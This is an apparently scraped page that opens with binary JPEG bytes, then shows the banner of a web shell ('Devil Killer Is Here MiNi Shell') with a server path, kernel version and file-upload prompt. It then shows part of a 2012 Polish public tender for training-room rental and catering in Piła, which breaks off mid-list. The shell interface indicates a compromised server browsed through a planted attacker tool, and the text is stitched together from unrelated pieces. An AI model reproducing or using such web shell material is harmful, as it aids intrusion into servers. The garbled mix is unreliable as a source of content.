JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120224/56788-N-2012.html

<p class="kh_header"><b>Piła: Wynajem sal oraz catering dla uczestników szkoleń realizowanych w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013</b><br>
<b>Numer ogłoszenia: 56788 - 2012; data zamieszczenia: 24.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Stowarzyszenie Gmin i Powiatów Nadnoteckich , ul. Grunwaldzka 2, 64-920 Piła, woj. wielkopolskie, tel. 67 215 27 90, faks 67 215 27 90 w.33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sgipn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wynajem sal oraz catering dla uczestników szkoleń realizowanych w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wynajęcie sal szkoleniowych z wyposażeniem multimedialnym i zapewnienie cateringu dla uczestników organizowanych szkoleń.
Zamówienie prowadzone jest w ramach dwóch Projektów - Dobry i Przyjazny Urząd i Profesjonalizm i nowoczesność w JST - realizowanych w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytetu V Dobre rządzenie, Działania 5.2 Wzmocnienie potencjału administracji samorządowej, Poddziałania 5.2.1 Modernizacja zarządzania w administracji samorządowej. 
W ramach Pierwszej części zamówienia przedmiotem zamówienia jest wynajem sal szkoleniowych z wyposażeniem multimedialnym dla potrzeb przeprowadzenia szkoleń oraz zapewnienie cateringu dla uczestników szkoleń w miejscu realizacji szkoleń dla:
a)	48 urzędników na kierowniczych stanowiskach urzędniczych 
b)	120 urzędników według potrzeb stanowiska pracy 
z 6 jednostek samorządu terytorialnego:
- Urzędu Miasta w Trzciance,
- Urzędu Miasta w Czarnkowie,
- Urzędu Gminy w Czarnkowie,
- Urzędu Gminy w Lubaszu,
- Urzędu Miasta w Wieleniu,
- Starostwa Powiatowego w Czarnkowie.
Szkolenia dla 48 urzędników na kierowniczych stanowiskach przeprowadzone zostaną w podziale na 4 grupy12-sto osobowe w przeciągu 40 dni w okresie:
- Kwiecień 2012 r.
- Maj 2012 r. 
- Czerwiec 2012 r.
- Wrzesień 2012 r.
- Październik 2012 r.
Każda z grup będzie miała prowadzone szkolenia przez 10 dni roboczych w 5 modułach tematycznych. Każda z grup będzie miała realizowany jeden moduł tematyczny w miesiącu (dwa dni robocze po 8 godzin). Szkolenia będą prowadzone w godzinach pracy urzędów tj. szkolenie będzie trwało od godz. 8.00 do godz. 16.00, z przerwami na catering:
- godz. 10.00 -10.15 przerwa kawowa
- godz. 12.00 - 12.30 przerwa obiadowa
- godz. 14.00 - 14.15 przerwa kawowa.
Szkolenia dla 120 urzędników według potrzeb stanowiska pracy przeprowadzone zostaną w podziale na 8 grup 15-sto osobowych w przeciągu 80 dni w okresie:
- wrzesień, październik, listopad, grudzień 2012 r., styczeń, luty 2013 r.
Każda z grup będzie miała prowadzone szkolenia przez 10 dni roboczych. Każda z grup będzie miała realizowane w miesiącu dwa lub trzy dni szkoleń po 8 godzin. Szkolenia będą prowadzone w godzinach pracy urzędów w dni robocze od poniedziałku do piątku tj. szkolenie będzie trwało od godz. 8.00 do godz. 16.00, z przerwami na catering:
- godz. 10.00 -10.15  przerwa kawowa
- godz. 12.00 - 12.30 przerwa obiadowa
- godz. 14.00 - 14.15 przerwa kawowa
Szczegółowy harmonogram szkoleń, będzie stanowił załącznik do umowy i zostanie przedstawiony Wykonawcy przed podpisaniem umowy, po wyłonieniu wykonawców szkoleń.
Sale szkoleniowe powinny byś wyposażone w stoły/biurka, krzesła z siedziskami miękkimi i oparciami. Wykluczamy ze standardu komfortowego krzesła z blatem roboczym. 
Catering musi być podawany na oddzielnej sali lub holu przynależnym do sali szkoleniowej w sposób zapewniający konsumpcję na siedząco przy stołach. Za sale komfortowe uznajemy sale właściwie oświetlone, wentylowane lub klimatyzowane zapewaniające komfortową i stała temperaturę zarówno w zimne jak i gorące dni. 

W ramach Drugiej części zamówienia przedmiotem zamówienia jest wynajem sal szkoleniowych z wyposażeniem multimedialnym dla potrzeb przeprowadzenia szkoleń oraz zapewnienie cateringu dla uczestników szkoleń w miejscu realizacji szkoleń dla:
a)	55 urzędników na kierowniczych stanowiskach urzędniczych,
b)	180 urzędników według potrzeb stanowiska pracy, 
z 5 jednostek samorządu terytorialnego:
- Urzędu Miasta Piły,
- Urzędu Miasta i Gminy w Wysokiej,
- Urzędu Gminy w Budzyniu,
- Urzędu Gminy i Miasta w Ujściu,
- Urzędu Gminy w Miasteczku Krajeńskim.	
Szkolenia dla 55 urzędników na kierowniczych stanowiskach przeprowadzone zostaną w podziale na 5 grup 11-sto osobowych w przeciągu 50 dni w okresie:
- Kwiecień 2012 r.
- Maj 2012 r.
- Czerwiec 2012 r. 
- Wrzesień 2012 r.
- Październik 2012 r.
Każda z grup będzie miała prowadzone szkolenia przez 10 dni roboczych w 5 modułach tematycznych. Każda z grup będzie miała realizowany jeden moduł tematyczny w miesiącu (dwa dni robocze po 8 godzin). Szkolenia będą prowadzone w godzinach pracy urzędów tj. szkolenie będzie trwało od godz. 8.00 do godz. 16.00, z przerwami na catering:
- godz. 10.00- 10.15 przerwa kawowa
- godz. 12.00- 12.30 przerwa obiadowa
- godz. 14.00-14.15 przerwa kawowa.
Szkolenia dla 180 urzędników według potrzeb stanowiska pracy przeprowadzone zostaną dla 12 grup 15-sto osobowych w przeciągu 120 dni w okresie:
- wrzesień, październik, listopad, grudzień 2012 r.
- styczeń, luty 2013 r.
Każda z grup będzie miała prowadzone szkolenia przez 10 dni roboczych. Każda z grup będzie miała realizowane w miesiącu dwa lub trzy dni szkoleń po 8 godzin. Szkolenia będą prowadzone w godzinach pracy urzędów w dni robocze od poniedziałku do piątku tj. szkolenie będzie trwało od godz. 8.00 do godz. 16.00, z przerwami na catering:
- godz. 10.00- 10.15 przerwa kawowa
- godz. 12.00 -12.30 przerwa obiadowa
- godz. 14.00 -14.15 przerwa kawowa

Szczegółowy harmonogram szkoleń, będzie stanowił załącznik do umowy i zostanie przedstawiony Wykonawcy przed podpisaniem umowy, po wyłonieniu wykonawców szkoleń.
Sale szkoleniowe powinny byś wyposażone w stoły/biurka, krzesła z siedziskami miękkimi i oparciami. Wykluczamy ze standardu komfortowego krzesła z blatem roboczym. 
Catering musi być podawany na oddzielnej sali lub holu przynależnym do sali szkoleniowej w sposób zapewniający konsumpcję na siedząco przy stołach. Za sale komfortowe uznajemy sale właściwie oświetlone, wentylowane lub klimatyzowane zapewaniające komfortową i stała temperaturę zarówno w zimne jak i gorące dni.

Szczegółowy opis przedmiotu zamówienia określony jest w punkcie 3.2 SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia Wykonawcy zamówień uzupełniających na podstawie art. 67 ust. 1 pkt 6 ustawy Pzp do wysokości 20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.22.00.00-9, 55.50.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać niezbędną wiedzę i doświadczenie - w tym zakresie wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej:
- w przypadku pierwszej części zamówienia - dwie usługi, z których każda polegała na: wynajmie sal szkoleniowych z wyposażeniem multimedialnym, zapewnieniu cateringu w trakcie przeprowadzanych szkoleń/warsztatów;
- w przypadku drugiej części zamówienia - dwie usługi, z których każda polegała na: wynajmie sal szkoleniowych z wyposażeniem multimedialnym, zapewnieniu cateringu w trakcie przeprowadzanych szkoleń/warsztatów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia ubiegać się mogą Wykonawcy, którzy dysponują lub będą dysponować:
- dla pierwszej części zamówienia - przynajmniej dwiema salami szkoleniowymi przystosowanymi do realizacji szkoleń dla minimum 15 osób dorosłych, wyposażonymi w odpowiednią do liczby uczestników ilość stołów/biurek oraz stół/biurko dla wykładowcy, odpowiednią do liczby uczestników ilość krzeseł oraz krzesło dla wykładowcy, odpowiednie oświetlenie, zestaw: laptop + projektor multimedialny, tablica z flipchartami (w zestawie papier i pisaki), a sale te będą znajdowały się w budynku mającym swoją siedzibę  w miejscowości Czarnków w woj. wielkopolskim lub miejscowości oddalonej do 15 km od m. Czarnków w woj. wielkopolskim;
- dla drugiej części zamówienia - przynajmniej dwiema salami szkoleniowymi przystosowanymi do realizacji szkoleń dla minimum 15 osób dorosłych, wyposażonymi w odpowiednią do liczby uczestników ilość stołów/biurek oraz stół/biurko dla wykładowcy, odpowiednią do liczby uczestników ilość krzeseł oraz krzesło dla wykładowcy, odpowiednie oświetlenie, zestaw: laptop + projektor multimedialny, tablica z flipchartami (w zestawie papier i pisaki), a sale te będą znajdowały się w budynku mającym swoją siedzibę  w miejscowości Piła w woj. wielkopolskim lub miejscowości oddalonej do 15 km od m. Piła w woj. wielkopolskim.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien znajdować się w sytuacji ekonomicznej i finansowej gwarantującej wykonanie zamówienia i w tym względzie udokumentuje, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 50.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony Formularz oferta - Załącznik nr 1 do SIWZ. Wypełniony Formularz cenowy - Załącznik nr 2 do SIWZ. Wypełnione oświadczenia - Załącznik nr 5a i 5b do SIWZ. Pełnomocnictwo do podpisania oferty i umowy, jeżeli forma reprezentacji nie wynika z innych dokumentów złożonych wraz z ofertą.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy, na podstawie art. 144 ust. 1 ustawy Pzp, polegających na:
1) zmianie terminu wykonania przedmiotu umowy na skutek wystąpienia przyczyn, które skutkują niemożliwością terminowego wykonania przedmiotu umowy,
2) zmianie terminów oraz zasad płatności na skutek wystąpienia przyczyn niezależnych od Zamawiającego oraz Wykonawcy, których nie można było przewidzieć w chwili zawarcia umowy,
3) zmianie innych postanowień umownych tylko w uzasadnionych przypadkach niezależnych od stron, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sgipn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Stowarzyszenie Gmin i Powiatów Nadnoteckich 
ul. Grunwaldzka 2, 64-920 Piła, pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2012 godzina 09:00, miejsce: Stowarzyszenie Gmin i Powiatów Nadnoteckich 
ul. Grunwaldzka 2, 64-920 Piła, pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekty współfinansowane ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego, realizowane w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytetu V Dobre rządzenie, Działania 5.2 Wzmocnienie potencjału administracji samorządowej, Poddziałania 5.2.1 Modernizacja zarządzania w administracji samorządowej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wynajem sal szkoleniowych z wyposażeniem multimedialnym i zapewnienie cateringu dla uczestników szkoleń realizowanych w ramach Projektu Dobry i Przyjazny Urząd.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wynajem sal szkoleniowych z wyposażeniem multimedialnym dla potrzeb przeprowadzenia szkoleń oraz zapewnienie cateringu dla uczestników szkoleń w miejscu realizacji szkoleń dla:
a) 48 urzędników na kierowniczych stanowiskach urzędniczych 
b) 120 urzędników według potrzeb stanowiska pracy 
z 6 jednostek samorządu terytorialnego: Urzędu Miasta w Trzciance, Urzędu Miasta w Czarnkowie, Urzędu Gminy w Czarnkowie, Urzędu Gminy w Lubaszu, Urzędu Miasta w Wieleniu, Starostwa Powiatowego w Czarnkowie.
Szkolenia dla 48 urzędników na kierowniczych stanowiskach przeprowadzone zostaną w podziale na 4 grupy12-sto osobowe w przeciągu 40 dni w okresie: Kwiecień 2012 r., Maj 2012 r., Czerwiec 2012 r., Wrzesień 2012 r., Październik 2012 r. Każda z grup będzie miała prowadzone szkolenia przez 10 dni roboczych w 5 modułach tematycznych. Każda z grup będzie miała realizowany jeden moduł tematyczny w miesiącu (dwa dni robocze po 8 godzin). Szkolenia będą prowadzone w godzinach pracy urzędów tj. szkolenie będzie trwało od godz. 8.00 do godz. 16.00, z przerwami na catering:
- godz. 10.00 -10.15 przerwa kawowa
- godz. 12.00 - 12.30 przerwa obiadowa
- godz. 14.00 - 14.15 przerwa kawowa.
Szkolenia dla 120 urzędników według potrzeb stanowiska pracy przeprowadzone zostaną w podziel na 8 grup 15-sto osobowych w przeciągu 80 dni w okresie: wrzesień, październik, listopad, grudzień 2012 r., styczeń, luty 2013 r.
Każda z grup będzie miała prowadzone szkolenia przez 10 dni roboczych. Każda z grup będzie miała realizowane w miesiącu dwa lub trzy dni szkoleń po 8 godzin. Szkolenia będą prowadzone w godzinach pracy urzędów w dni robocze od poniedziałku do piątku tj. szkolenie będzie trwało od godz. 8.00 do godz. 16.00, z przerwami na catering:
- godz. 10.00 -10.15  przerwa kawowa
- godz. 12.00 - 12.30 przerwa obiadowa
- godz. 14.00 - 14.15 przerwa kawowa.
Szczegółowy opis przedmiotu zamówienia określony został w punkcie 3.2.1 SIWZ
Szczegółowy harmonogram szkoleń, będzie stanowił załącznik do umowy i zostanie przedstawiony Wykonawcy przed podpisaniem umowy, po wyłonieniu wykonawców szkoleń.

Sale szkoleniowe powinny byś wyposażone w stoły/biurka, krzesła z siedziskami miękkimi i oparciami. Wykluczamy ze standardu komfortowego krzesła z blatem roboczym. 
Catering musi być podawany na oddzielnej sali lub holu przynależnym do sali szkoleniowej w sposób zapewniający konsumpcję na siedząco przy stołach. Za sale komfortowe uznajemy sale właściwie oświetlone, wentylowane lub klimatyzowane zapewaniające komfortową i stała temperaturę zarówno w zimne jak i gorące dni.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.22.00.00-9, 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wynajem sal szkoleniowych z wyposażeniem multimedialnym i zapewnienie cateringu dla uczestników szkoleń realizowanych w ramach Projektu Profesjonalizm i nowoczesność w JST.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wynajem sal szkoleniowych z wyposażeniem multimedialnym dla potrzeb przeprowadzenia szkoleń oraz zapewnienie cateringu dla uczestników szkoleń w miejscu realizacji szkoleń dla:
a) 55 urzędników na kierowniczych stanowiskach urzędniczych,
b) 180 urzędników według potrzeb stanowiska pracy, 
